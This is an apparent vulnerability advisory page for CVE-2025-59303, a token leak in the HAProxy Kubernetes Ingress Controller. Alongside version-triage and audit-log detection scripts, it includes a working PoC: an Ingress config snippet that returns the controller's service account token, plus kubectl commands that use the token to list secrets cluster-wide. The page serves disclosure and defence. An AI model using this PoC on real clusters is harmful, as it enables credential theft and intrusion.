Security Vulnerability Report
CVE-2025-59303 CVSS 6.4 MEDIUM

CVE-2025-59303

Published: 2025-10-08 16:15:39
Last Modified: 2026-04-15 00:35:42

Description

HAProxy Kubernetes Ingress Controller before 3.1.13, when the config-snippets feature flag is used, accepts config snippets from users with create/update permissions. This can result in obtaining an ingress token secret as a response. The fixed versions of HAProxy Enterprise Kubernetes Ingress Controller are 3.0.16-ee1, 1.11.13-ee1, and 1.9.15-ee1.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is published for this CVE; the affected products below are taken from the description.

HAProxy Kubernetes Ingress Controller, versions before 3.1.13
HAProxy Enterprise Kubernetes Ingress Controller, versions before 3.0.16-ee1
HAProxy Enterprise Kubernetes Ingress Controller, versions before 1.11.13-ee1
HAProxy Enterprise Kubernetes Ingress Controller, versions before 1.9.15-ee1
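The first thing a practitioner needs from this report is a yes/no on their own clusters. The script below is an added example, not part of the advisory or the HAProxy project: it walks `kubectl get pods -A -o json` output, picks out controller containers by image name (the `kubernetes-ingress` substring and the `3.1.12` / `3.0.15-ee1` tag shapes are assumptions), and compares each tag with the fixed versions quoted above. Enterprise builds are compared only within their own release line, because the advisory names a fix per line rather than a single cut-off.

```python
"""Version triage for CVE-2025-59303 (added example; not from the advisory).

Walks `kubectl get pods -A -o json` output, finds HAProxy Kubernetes Ingress
Controller containers by image name, and compares their tag with the fixed
versions stated in the advisory."""
import json
import re

# Fixed versions as stated in the advisory. Anything older on the same line is affected.
FIXED_OSS = (3, 1, 13)                 # open-source controller: fixed from 3.1.13
FIXED_EE = {                           # Enterprise controller, keyed by release line
    (3, 0): (3, 0, 16, 1),             # 3.0.16-ee1
    (1, 11): (1, 11, 13, 1),           # 1.11.13-ee1
    (1, 9): (1, 9, 15, 1),             # 1.9.15-ee1
}

# Assumed tag shapes: "3.1.12", "v3.1.12", "3.0.15-ee1". Anything else is unparsable.
_TAG_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-ee(\d+))?$")


def parse_tag(tag):
    """'v3.1.12' -> (3, 1, 12); '3.0.15-ee2' -> (3, 0, 15, 2); None if unrecognised."""
    m = _TAG_RE.match(tag.strip())
    if not m:
        return None
    major, minor, patch, ee = m.groups()
    version = (int(major), int(minor), int(patch))
    return version + ((int(ee),) if ee is not None else ())


def is_affected(tag):
    """True if inside the affected range, False if at or past the fix, None if the
    tag cannot be judged (e.g. 'latest', or an Enterprise release line the advisory
    does not mention, which needs manual review)."""
    version = parse_tag(tag)
    if version is None:
        return None
    if len(version) == 4:  # Enterprise build: compare within its own release line
        fixed = FIXED_EE.get(version[:2])
        return None if fixed is None else version < fixed
    return version < FIXED_OSS


def image_tag(image):
    """Extract the tag from an image reference; digests are dropped, no tag means 'latest'."""
    name = image.split("@", 1)[0]               # strip @sha256:... digest
    last = name.rsplit("/", 1)[-1]              # registry:5000/ns/img:tag -> img:tag
    return last.split(":", 1)[1] if ":" in last else "latest"


def triage(pods_json):
    """Return {(namespace, pod): (tag, is_affected)} for controller containers."""
    result = {}
    for pod in json.loads(pods_json).get("items", []):
        meta = pod.get("metadata", {})
        for container in pod.get("spec", {}).get("containers", []):
            image = container.get("image", "")
            if "kubernetes-ingress" not in image:   # assumed image naming
                continue
            tag = image_tag(image)
            result[(meta.get("namespace"), meta.get("name"))] = (tag, is_affected(tag))
    return result


# Constructed sample (not real cluster output).
SAMPLE_PODS_JSON = json.dumps({"items": [
    {"metadata": {"namespace": "haproxy-controller", "name": "haproxy-kubernetes-ingress-7d9c4"},
     "spec": {"containers": [{"name": "kubernetes-ingress-controller",
                              "image": "haproxytech/kubernetes-ingress:3.1.12"}]}},
    {"metadata": {"namespace": "default", "name": "web-0"},
     "spec": {"containers": [{"name": "web", "image": "nginx:1.27"}]}},
]})

if __name__ == "__main__":
    for (ns, pod), (tag, affected) in triage(SAMPLE_PODS_JSON).items():
        state = {True: "AFFECTED", False: "fixed", None: "review manually"}[affected]
        print(f"{ns}/{pod}: {tag} -> {state}")
```

A version on the fixed side is not the whole story: the description ties the bug to the config-snippets feature flag, so an affected version on which snippets are disabled in the controller's arguments has no exposure, and an unparsable tag such as `latest` must be resolved from the running image's digest rather than guessed.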

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# CVE-2025-59303 - HAProxy Kubernetes Ingress Controller secret leak PoC
#
# A user holding only create/update on Ingress objects attaches a config snippet
# to an Ingress. The controller renders the snippet into the haproxy.cfg that runs
# inside the controller pod, so the directives execute with that pod's view of the
# file system, which includes the controller's projected service account token.
#
# Only directives HAProxy accepts are kept here. An earlier version of this PoC
# mixed in shell substitution ("$(cat ...)"), an "http-request lua.load" directive
# and a "str(),/path" converter; none of those is HAProxy syntax and the reload
# would fail. "http-request return ... file <path>" is HAProxy's documented action
# for serving a local file as the response body, which is the behaviour the
# advisory describes (the token is returned "as a response").
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  namespace: attacker-namespace
  annotations:
    # Ingress-level snippet annotation honoured while the config-snippets feature is enabled.
    haproxy.org/backend-config-snippet: |
      http-request return status 200 content-type text/plain file /var/run/secrets/kubernetes.io/serviceaccount/token
spec:
  rules:
  - host: attacker.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: backend-service
            port:
              number: 80
---
# After the Ingress is admitted and the controller reloads, any request for the
# host is answered with the token file instead of being forwarded to the backend:
#
#   curl -s http://attacker.example.com/
#   eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
#
# The token authenticates to the API server as the controller's service account,
# which typically holds cluster-wide read on Secrets (it needs TLS secrets) and on
# Ingress, Service and Endpoints objects in every namespace:
#
#   TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9..."
#   kubectl --token=$TOKEN --server=https://kubernetes-api:6443 get secrets -A
#   kubectl --token=$TOKEN --server=https://kubernetes-api:6443 get pods -A
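On the defensive side the useful signal is the API server audit log, since the Ingress write is the only step the attacker has to perform against the cluster. The detector below is an added example, not code from the advisory or the HAProxy project. It assumes the audit policy records request bodies for `ingresses` (level `Request` or `RequestResponse`), that snippet annotations follow the `haproxy.org/*config-snippet` key pattern, and that the sample events are constructed, not real log data. It flags every create/update/patch that carries a snippet at all (snippets from application teams are worth reviewing regardless), and escalates when the snippet references the service account token path or a file-serving directive.

```python
"""Detection over Kubernetes API audit events for CVE-2025-59303 style abuse
(added example; not from the advisory). Flags Ingress writes that carry a HAProxy
config-snippet annotation and escalates when the snippet touches local files."""
import json

ANNOTATION_PREFIX = "haproxy.org/"      # assumed key pattern for snippet annotations
SNIPPET_SUFFIX = "config-snippet"
WRITE_VERBS = {"create", "update", "patch"}
# Substrings indicating the snippet is trying to read or serve local files.
HIGH_RISK_MARKERS = (
    "/var/run/secrets/",
    "serviceaccount/token",
    " file ",                           # e.g. "http-request return ... file <path>"
    "lua-load",
    "lua.",
)


def _annotations(obj):
    """metadata.annotations from an audit requestObject. Works for a full object
    (create/update) and for a JSON merge or strategic merge patch body; a JSON
    Patch body is a list and yields nothing."""
    if not isinstance(obj, dict):
        return {}
    meta = obj.get("metadata")
    if not isinstance(meta, dict):
        return {}
    ann = meta.get("annotations")
    return ann if isinstance(ann, dict) else {}


def analyze_event(event):
    """Return a finding dict for one audit event, or None if it is not relevant."""
    ref = event.get("objectRef") or {}
    if ref.get("resource") != "ingresses" or event.get("verb") not in WRITE_VERBS:
        return None
    snippets = {
        k: v for k, v in _annotations(event.get("requestObject")).items()
        if k.startswith(ANNOTATION_PREFIX) and k.endswith(SNIPPET_SUFFIX)
    }
    if not snippets:
        return None
    text = "\n".join(str(v) for v in snippets.values())
    markers = [m for m in HIGH_RISK_MARKERS if m in text]
    return {
        "user": (event.get("user") or {}).get("username"),
        "verb": event["verb"],
        "namespace": ref.get("namespace"),
        "name": ref.get("name"),
        "annotations": sorted(snippets),
        "severity": "high" if markers else "medium",
        "markers": markers,
    }


def scan_audit_log(lines):
    """Parse a JSON-lines audit log and return the list of findings, in order."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue                    # skip truncated or non-JSON lines
        finding = analyze_event(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (not real log data).
SAMPLE_AUDIT_LOG = [
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse",
        "verb": "create", "user": {"username": "dev-alice"},
        "objectRef": {"resource": "ingresses", "namespace": "attacker-namespace", "name": "malicious-ingress"},
        "requestObject": {"metadata": {"annotations": {
            "haproxy.org/backend-config-snippet":
                "http-request return status 200 content-type text/plain file /var/run/secrets/kubernetes.io/serviceaccount/token\n"}}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse",
        "verb": "update", "user": {"username": "dev-bob"},
        "objectRef": {"resource": "ingresses", "namespace": "shop", "name": "storefront"},
        "requestObject": {"metadata": {"annotations": {
            "haproxy.org/backend-config-snippet": "http-response set-header X-Frame-Options DENY\n"}}},
    }),
    json.dumps({                        # JSON Patch body: a list, so no annotations are visible
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse",
        "verb": "patch", "user": {"username": "ci-deployer"},
        "objectRef": {"resource": "ingresses", "namespace": "shop", "name": "storefront"},
        "requestObject": [{"op": "replace", "path": "/spec/rules/0/host", "value": "shop.example.com"}],
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Metadata",
        "verb": "get", "user": {"username": "dev-alice"},
        "objectRef": {"resource": "ingresses", "namespace": "shop", "name": "storefront"},
    }),
]

if __name__ == "__main__":
    for f in scan_audit_log(SAMPLE_AUDIT_LOG):
        print(f"[{f['severity']}] {f['user']} {f['verb']} {f['namespace']}/{f['name']} markers={f['markers']}")
```

Two caveats follow from the sample. A JSON Patch request body is an operation list, so a snippet added that way is invisible to this check; catching it needs the `responseObject` at `RequestResponse` level, or an admission webhook that rejects snippet annotations outright for namespaces that are not allowed to use them. And the `Metadata` level event shows why the audit policy matters: without request bodies for `ingresses` the detector has nothing to inspect.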

References

https://haproxy.com/blog/cve-2025-59303-haproxy-kubernetes-ingress-controller-secret-leak
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59303", "sourceIdentifier": "[email protected]", "published": "2025-10-08T16:15:38.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HAProxy Kubernetes Ingress Controller before 3.1.13, when the config-snippets feature flag is used, accepts config snippets from users with create/update permissions. This can result in obtaining an ingress token secret as a response. The fixed versions of HAProxy Enterprise Kubernetes Ingress Controller are 3.0.16-ee1, 1.11.13-ee1, and 1.9.15-ee1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-791"}]}], "references": [{"url": "https://haproxy.com/blog/cve-2025-59303-haproxy-kubernetes-ingress-controller-secret-leak", "source": "[email protected]"}]}}